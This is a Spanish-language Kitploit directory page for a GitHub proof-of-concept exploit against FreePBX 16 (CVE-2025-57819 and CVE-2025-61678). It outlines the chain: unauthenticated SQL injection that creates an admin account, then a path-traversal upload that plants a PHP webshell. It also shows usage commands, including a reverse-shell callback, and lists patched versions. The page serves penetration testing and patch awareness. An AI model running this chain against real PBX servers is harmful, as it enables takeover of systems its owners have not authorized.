Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
FreePBX-CVE-2025-57819-RCE — Cadena de explotación de inyección SQL no autenticada y carga arbitraria de archivos para FreePBX 16, que logra ejecución remota de código mediante la creación de un administrador y el despliegue de una webshell. | Kitploit
Herramientas/GitHubGitHub/0xehab/freepbx-cve-2025-57819-rce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHub0xehab/freepbx-cve-2025-57819-rce

FreePBX-CVE-2025-57819-RCE

Cadena de explotación de inyección SQL no autenticada y carga arbitraria de archivos para FreePBX 16, que logra ejecución remota de código mediante la creación de un administrador y el despliegue de una webshell.

Ver Repositorio
131hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

FreePBX 16 — SQLi no autenticado a RCE

Exploit de prueba de concepto que encadena dos vulnerabilidades de FreePBX para pasar de acceso nulo a ejecución remota de código en FreePBX 16.

CVEComponenteImpacto
CVE-2025-57819Cargador del módulo Endpoint (parámetro brand)Inyección SQL apilada no autenticada
CVE-2025-61678Cargador de firmware de Endpoint Manager (parámetro fwbrand)Carga arbitraria de archivos autenticada (path traversal)

Cómo funciona

  1. Crear un administrador (CVE-2025-57819) — una inyección SQL apilada accesible sin autenticación a través del cargador de endpoints con nombre se utiliza para INSERT un administrador con acceso completo directamente en la tabla ampusers.
  2. Autenticarse — el PoC inicia sesión en el panel de administración como el usuario recién creado.
  3. Colocar una webshell (CVE-2025-61678) — se abusa del manejador de carga de firmware de Endpoint Manager con un traversal ../../../var/www/html/<dir> en fwbrand para escribir una webshell PHP en la raíz web.
  4. Ejecutar — ejecuta un solo comando o recibe un shell inverso interactivo.

Versiones afectadas

FreePBX 16 (módulo Endpoint anterior a 16.0.92). También parcheado en 17.0.6. Actualice a una versión corregida.

Uso

root@kitploit:~
# single command
python3 exploit.py --rhost pbx.example.com --command "id"

# interactive reverse shell (auto-listener via pwntools)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444

# plain HTTP / custom port
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"

Opciones

FlagDescripción
--rhostHost objetivo (obligatorio)
--rportPuerto objetivo (por defecto 443)
--httpUsar HTTP en lugar de HTTPS
--lhost / --lportDirección de callback de shell inverso
--commandEjecutar un solo comando en lugar de un shell

Requisitos

root@kitploit:~
pip install requests pwntools

Aviso legal

Solo para pruebas de seguridad autorizadas y fines educativos. Úselo exclusivamente en sistemas de su propiedad o para los que tenga permiso explícito por escrito para realizar pruebas. El autor no asume ninguna responsabilidad por el mal uso.

Palabras clave

FreePBX · FreePBX 16 · FreePBX 16.0.40.7 · Sangoma PBX · Asterisk · CVE-2025-57819 · CVE-2025-61678 · inyección SQL no autenticada · inyección de consultas apiladas · módulo Endpoint · Endpoint Manager · carga de archivos autenticada · path traversal · ejecución remota de código · RCE · PoC · exploit · seguridad VoIP


linkedin: ehxb · medium.com/@Ehxb · github 0xEhxb

Descargar herramienta